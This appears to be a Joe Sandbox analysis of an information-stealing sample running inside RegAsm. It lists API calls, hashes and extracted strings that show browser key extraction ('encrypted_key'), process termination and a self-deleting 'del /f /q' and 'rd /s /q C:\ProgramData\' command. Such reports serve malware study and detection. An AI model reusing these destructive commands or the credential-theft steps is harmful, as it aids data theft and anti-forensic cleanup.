                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B3C4
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B3D2
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B3E4
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B3F2
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B412
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B424
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B432
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B444
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 0040B452
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B464
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040B472
                                                    • lstrlenA.KERNEL32(?), ref: 0040B4BF
                                                    • lstrlenA.KERNEL32(?), ref: 0040B4CD
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B404
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 004135B9: memset.MSVCRT ref: 004135D4
                                                      • Part of subcall function 004135B9: OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041368A
                                                      • Part of subcall function 004135B9: TerminateProcess.KERNEL32(00000000,00000000), ref: 004136A7
                                                      • Part of subcall function 004135B9: CloseHandle.KERNEL32(00000000), ref: 004136B3
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                    • memset.MSVCRT ref: 0040B518
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$lstrlen$Process$HeapOpenmemset$AllocCloseCreateHandleObjectSingleSystemTerminateThreadTimeWait
                                                    • String ID:
                                                    • API String ID: 1071764044-0
                                                    • Opcode ID: fa250544dc97d75aede4d3142a785a3f47aebc49b560d234d34461475db5f5ce
                                                    • Instruction ID: 6bcecfaba4de89f08d2b33528e6d3ad2465a3a73166f70e19fa6e2e5cb51743f
                                                    • Opcode Fuzzy Hash: fa250544dc97d75aede4d3142a785a3f47aebc49b560d234d34461475db5f5ce
                                                    • Instruction Fuzzy Hash: 23E12F72900208AFDB05EBA1EC56EED7B79EF15305F10506AF216B10F1EF395A89CB58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
                                                    • API String ID: 0-3330941169
                                                    • Opcode ID: 7284075bb40d7789c68c41f6a2455cc4b625cc5e7ddbe5d654d91e58fe07c7e6
                                                    • Instruction ID: f6e7df0e0e4caac7301e4d777cf9c3997f17eb0c50a8893d28e55a63f810fd6c
                                                    • Opcode Fuzzy Hash: 7284075bb40d7789c68c41f6a2455cc4b625cc5e7ddbe5d654d91e58fe07c7e6
                                                    • Instruction Fuzzy Hash: 5F7128BAB007115BC7059A59BE4064EB7D1EFC1212F2408B9FD03C7351EB29F95A97A3
                                                    APIs
                                                    • lstrlenA.KERNEL32(?,?,?,00420A84,?), ref: 0041F937
                                                    • StrCmpCA.SHLWAPI(?,0042AA34,?,?,00420A84,?), ref: 0041F981
                                                    • StrCmpCA.SHLWAPI(?,.zip,?,?,00420A84,?), ref: 0041F99A
                                                    • StrCmpCA.SHLWAPI(?,.zoo,?,?,00420A84,?), ref: 0041F9B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                    • API String ID: 1659193697-51310709
                                                    • Opcode ID: 3224264fa3be61d7cd4551fc1dba197681315500aa232dff3bd41d36febbc101
                                                    • Instruction ID: 6b8320d09f5c7083ee15ac42653dfd6e115afcb84605d9c9dd3679c1fa820a61
                                                    • Opcode Fuzzy Hash: 3224264fa3be61d7cd4551fc1dba197681315500aa232dff3bd41d36febbc101
                                                    • Instruction Fuzzy Hash: 5531FB74B44104FBCF10EF61DE45BEE7BB5AF217887604073E445A6220D37D9EA7AA0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
                                                    • API String ID: 0-1070437968
                                                    • Opcode ID: d88ac5857dd34f427639e150071d6eb4d35fb5622b58dac6626d689bea23165d
                                                    • Instruction ID: 88fdb74ddddcedf4a3408a6f83456db82a8c93aea6a002cf56ef0373ac52e8d9
                                                    • Opcode Fuzzy Hash: d88ac5857dd34f427639e150071d6eb4d35fb5622b58dac6626d689bea23165d
                                                    • Instruction Fuzzy Hash: 1102D0B4E047429FD7108F24DC84F9B77E4AF84316F044568E9899B342EB7EF5548BA2
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00414AEC
                                                    • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,00000104,?,00000104), ref: 00414BE0
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                      • Part of subcall function 004133A2: StrStrA.SHLWAPI(?,?,?,?,00414C10,?,00000000), ref: 004133AC
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414C1B
                                                      • Part of subcall function 004133A2: lstrcpyn.KERNEL32(00640E18,?,?), ref: 004133CF
                                                      • Part of subcall function 004133A2: lstrlenA.KERNEL32(?), ref: 004133E5
                                                      • Part of subcall function 004133A2: wsprintfA.USER32 ref: 00413403
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414C61
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414CA7
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414CED
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414D33
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414D79
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414DBF
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00414E05
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                    • strtok_s.MSVCRT ref: 00414F62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlenstrtok_s$FolderPathlstrcpynwsprintf
                                                    • String ID: false$true
                                                    • API String ID: 434863430-2658103896
                                                    • Opcode ID: 765c5d36a3a43330fc645abf35fb1820cb1d19ba016c45abc62f6d521b063b6a
                                                    • Instruction ID: 11c32ebd37ec89fc3e90f9bc277b4c1bec05cf9b0dada0b33f80a2abde32543e
                                                    • Opcode Fuzzy Hash: 765c5d36a3a43330fc645abf35fb1820cb1d19ba016c45abc62f6d521b063b6a
                                                    • Instruction Fuzzy Hash: F8D16CB190422DAFDF14EF64DC89ED973B8BB14308F00059AF519E6161EB389AC9CF58
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcessstrtok_s
                                                    • String ID: block
                                                    • API String ID: 3407564107-2199623458
                                                    • Opcode ID: b27fb4b0cd0599404b7641d4c3026fdea6b6175c9d5b5fbf1cac4d7974c87707
                                                    • Instruction ID: d70f04a8b6de591f0040fb7af7f12beae7af2c4fee756315f502bbbdee6ae6db
                                                    • Opcode Fuzzy Hash: b27fb4b0cd0599404b7641d4c3026fdea6b6175c9d5b5fbf1cac4d7974c87707
                                                    • Instruction Fuzzy Hash: E8513570A40209FFCB11EF90E844BDE3BB5AF54349F20415AE801AB261E779CAD1CF1A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
                                                    • API String ID: 0-3900766660
                                                    • Opcode ID: b76bc822d470947b4aac9b1fe974777dd0d9edbdcd23a928d6da77299a7a1822
                                                    • Instruction ID: b0141ee1afadfc70a5a7f501d38f42731827ad77a0625cd59ce23f80b012cb5c
                                                    • Opcode Fuzzy Hash: b76bc822d470947b4aac9b1fe974777dd0d9edbdcd23a928d6da77299a7a1822
                                                    • Instruction Fuzzy Hash: 47E1C4B8A047419BD710CF25DC80B9B77E9AF88714F04452DE95A9B242E73FF849C7A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
                                                    • API String ID: 0-1477268580
                                                    • Opcode ID: 5f04eb71aeb960060d4cf0bf3adfdbde86e0f4332827150870b27f453b1f6321
                                                    • Instruction ID: 7277848b02fa97367b4445202eea946fce0ce08edf053eb40c5f4428f9e84b8b
                                                    • Opcode Fuzzy Hash: 5f04eb71aeb960060d4cf0bf3adfdbde86e0f4332827150870b27f453b1f6321
                                                    • Instruction Fuzzy Hash: 2251DFB9A043019FD7108F28DC80A56B7E4FF84325F04496DEA568B742EB7EF8159BA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
                                                    • API String ID: 0-3918257174
                                                    • Opcode ID: 89e84e2e4d4325b5aa329622e06957a7847cdbdd05499dc82c7d7d1925c226ee
                                                    • Instruction ID: 85b0211a3c0a74672508bb17a311684fbfdeda31874060f9d839023315e605b5
                                                    • Opcode Fuzzy Hash: 89e84e2e4d4325b5aa329622e06957a7847cdbdd05499dc82c7d7d1925c226ee
                                                    • Instruction Fuzzy Hash: AC5147719003229BC7009F24ED44B9BB7E8EF84765F140564FD469B241E73AF916EBA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %!.15g$%!.20e$%lld$NULL$NULL
                                                    • API String ID: 0-2115304644
                                                    • Opcode ID: 7e81b1d6de7bdf747218c046ce4b180d74700afc102f6221691c59350f2ddb5b
                                                    • Instruction ID: 31a1f19db781ff53b959d1d78c0c28e9b1fba348f1c0c6f621df2977d50328a0
                                                    • Opcode Fuzzy Hash: 7e81b1d6de7bdf747218c046ce4b180d74700afc102f6221691c59350f2ddb5b
                                                    • Instruction Fuzzy Hash: 51516879904711ABD700DF18DC41ADBB7E4EF81314F45499DF89AA7202E33AF649C7A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-2988319395
                                                    • Opcode ID: 12fff374ad93eb6b276d09b8b72e3905186011ec531b884f12f67464e49cf815
                                                    • Instruction ID: 271b5805bf214ae7bc3d5de6fed57db8d3d7558b261945658e007c09aa864ad8
                                                    • Opcode Fuzzy Hash: 12fff374ad93eb6b276d09b8b72e3905186011ec531b884f12f67464e49cf815
                                                    • Instruction Fuzzy Hash: AFD1B1B0D08342AFE7108F25DC84B9B77E8BF44726F044568E95A9A341E73EF554CBA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,origin
                                                    • API String ID: 0-4198660907
                                                    • Opcode ID: 11c78489eee4d59e85224cb554d7652c0832d21bfb76a0e0fea2fbc7e3a20f3f
                                                    • Instruction ID: 8a35a5a2895ead7c561e87b57bda789a2071616fdbb796104039e7f95628cadf
                                                    • Opcode Fuzzy Hash: 11c78489eee4d59e85224cb554d7652c0832d21bfb76a0e0fea2fbc7e3a20f3f
                                                    • Instruction Fuzzy Hash: 31719CB5508301DFC7109FA9D88095ABBE9FF89710F544D2CFA8686620E73BE861DB52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s%c%s$winFullPathname1$winFullPathname2
                                                    • API String ID: 0-2846052723
                                                    • Opcode ID: 3a9490bbf9496e38c51eac32a0943ed5a87572aedab9c7af961ea41f29b7bb8e
                                                    • Instruction ID: d8016add2d597649e3f90ff9cdd3850ffe030d27cc0b5d13790a8de65b5b5bd3
                                                    • Opcode Fuzzy Hash: 3a9490bbf9496e38c51eac32a0943ed5a87572aedab9c7af961ea41f29b7bb8e
                                                    • Instruction Fuzzy Hash: E241BDB5B043412BF7115A24BC88FBB37D9EF41660F28056CF98A59181E62BF952C372
                                                    APIs
                                                    • memset.MSVCRT ref: 0041A51F
                                                    • memset.MSVCRT ref: 0041A52F
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041A545
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0041A717
                                                    • memset.MSVCRT ref: 0041A725
                                                    • memset.MSVCRT ref: 0041A73B
                                                    • ExitProcess.KERNEL32 ref: 0041A750
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpymemset$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                    • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                    • API String ID: 1134881415-1686486140
                                                    • Opcode ID: a2c79353035dc7988b6cc5809f2dfe8a9fe245d89de2abe060d15ad9bc2eef87
                                                    • Instruction ID: 2ae990150077dd927b68574e96d60916ec747782fc498b2aa95a2e9cfca832fe
                                                    • Opcode Fuzzy Hash: a2c79353035dc7988b6cc5809f2dfe8a9fe245d89de2abe060d15ad9bc2eef87
                                                    • Instruction Fuzzy Hash: A151EFB29111189ADB15FB51DD92FDD777CAF54305F8000AAF31AA21A2DF386B88CF58
                                                    APIs
                                                    • memset.MSVCRT ref: 0041711F
                                                    • memset.MSVCRT ref: 00417135
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00417164
                                                    • lstrcatA.KERNEL32(?), ref: 00417182
                                                    • lstrcatA.KERNEL32(?,?), ref: 00417196
                                                    • lstrcatA.KERNEL32(?), ref: 004171A9
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412F4C: GetFileAttributesA.KERNEL32(00000000,?,0040E526,?,00425200,?,?), ref: 00412F5B
                                                      • Part of subcall function 00407F8E: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00407FDF
                                                      • Part of subcall function 00407F8E: memcmp.MSVCRT ref: 00408034
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                      • Part of subcall function 004134CA: GlobalAlloc.KERNEL32(00000000,0041723B,0041723B), ref: 004134DC
                                                    • StrStrA.SHLWAPI(?), ref: 0041724F
                                                    • GlobalFree.KERNEL32(?), ref: 00417341
                                                      • Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407DE6
                                                      • Part of subcall function 00407DC2: LocalAlloc.KERNEL32(00000040,00406095,?,?,00406095,00000000,?), ref: 00407DF7
                                                      • Part of subcall function 00407DC2: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00406095,00000000,00000000), ref: 00407E1D
                                                      • Part of subcall function 00407DC2: LocalFree.KERNEL32(00000000,?,?,00406095,00000000,?), ref: 00407E31
                                                      • Part of subcall function 00408093: memcmp.MSVCRT ref: 004080AD
                                                      • Part of subcall function 00408093: memset.MSVCRT ref: 004080DF
                                                      • Part of subcall function 00408093: LocalAlloc.KERNEL32(00000040,?), ref: 0040812D
                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,000003E8), ref: 004172D7
                                                    • StrCmpCA.SHLWAPI(?,00425200,?,?,?,?,000003E8), ref: 004172F4
                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,000003E8), ref: 00417304
                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,000003E8), ref: 00417316
                                                    • lstrcatA.KERNEL32(00000000,00428E48,?,?,?,?,000003E8), ref: 00417324
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                    • String ID:
                                                    • API String ID: 1812951797-0
                                                    • Opcode ID: 2835926dd3b7af99b7d2bff13f43dcf0ab9554a6fddaecd92bc8552e99537314
                                                    • Instruction ID: a608612f317fa1ecc60f7c5688a44701b5bd02aa08d55213bb3fb888d79c7ab7
                                                    • Opcode Fuzzy Hash: 2835926dd3b7af99b7d2bff13f43dcf0ab9554a6fddaecd92bc8552e99537314
                                                    • Instruction Fuzzy Hash: B4613B72D0021CABDF11AFA0DD4AFDD77BDAB08304F0440AAF615E6091EB399B949F55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: content$docsize
                                                    • API String ID: 0-1024698521
                                                    • Opcode ID: 06748c555cd376a7b021af47e36a68f1bb6b302d89a067c13a85593c4c774dae
                                                    • Instruction ID: f369ea9b13dab3edeee35db1d5df36b7093f20933d41b903a22f43c1c1f616b5
                                                    • Opcode Fuzzy Hash: 06748c555cd376a7b021af47e36a68f1bb6b302d89a067c13a85593c4c774dae
                                                    • Instruction Fuzzy Hash: CCC10571A08312ABD710CF24EA84B9B73E4FF84350F650528FD469B250E77AF856DB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %!0.15g$%lld$JSON cannot hold BLOB values
                                                    • API String ID: 0-1047910854
                                                    • Opcode ID: 88f15654885d77b5045bea1ae456afa0a4b00fd6911b6242e1a54913ea0a2ae6
                                                    • Instruction ID: cdc6a789d7351d03fa403141a0e3a1a1043a0c2ac6f6481a1577cdb304d034ec
                                                    • Opcode Fuzzy Hash: 88f15654885d77b5045bea1ae456afa0a4b00fd6911b6242e1a54913ea0a2ae6
                                                    • Instruction Fuzzy Hash: 1451AF7E6043006EE3115A18DC41FFA3BEADFC2335F14025DF9914A282EB6FB55182A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %Q.$=%Q$PRAGMA
                                                    • API String ID: 0-2099833060
                                                    • Opcode ID: 74c77692082be7cee30039d61a12eb547f4dad1cd79bb863cd3c99b302260748
                                                    • Instruction ID: 72ed5fc4639fe8807c62b8dd799b4b57f442e5d3d14f9cd27b1eb37e11a78daa
                                                    • Opcode Fuzzy Hash: 74c77692082be7cee30039d61a12eb547f4dad1cd79bb863cd3c99b302260748
                                                    • Instruction Fuzzy Hash: 5471E476A083119BDB00DF68D880B9BB7E5AF84714F040569FD459B251E73EF918CBA2
                                                    APIs
                                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 0041FB15
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041FBD2
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041FBEE
                                                    • ReadFile.KERNEL32(00000000,?,00000002,?,00000000), ref: 0041FC03
                                                    • SetFilePointer.KERNEL32(00000000,00000024,00000000,00000000), ref: 0041FC12
                                                    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0041FC27
                                                    • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 0041FC4D
                                                    • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0041FC62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$PointerRead$HandleInformationSize
                                                    • String ID: ($PE
                                                    • API String ID: 2979504256-3347799738
